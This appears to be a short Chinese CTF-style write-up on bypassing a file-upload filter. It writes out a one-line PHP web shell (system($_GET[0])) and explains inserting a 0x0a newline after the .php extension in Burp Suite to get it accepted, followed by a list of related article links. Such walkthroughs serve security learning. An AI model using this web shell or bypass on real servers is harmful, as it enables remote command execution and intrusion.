Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
tmacfrank17 分钟前
网络编程中的直接内存与零拷贝数据与人工智能律师2 小时前
虚拟主播肖像权保护,数字时代的法律博弈James. 常德 student2 小时前
网络安全知识点purrrew3 小时前
【Java ee初阶】HTTP(2)玉笥寻珍5 小时前
筑牢信息安全防线:涉密计算机与互联网隔离的理论实践与风险防控uwvwko5 小时前
BUUCTF——web刷题第一页题解hgdlip5 小时前
怎么快速换电脑浏览器的ip:方法与注意事项可怜的Tom被玩弄于股掌之中5 小时前
BUUCTF——Nmap今儿敲了吗7 小时前
计网| 网际控制报文协议(ICMP)KALC7 小时前
告别“知识孤岛”:RAG赋能网络安全运营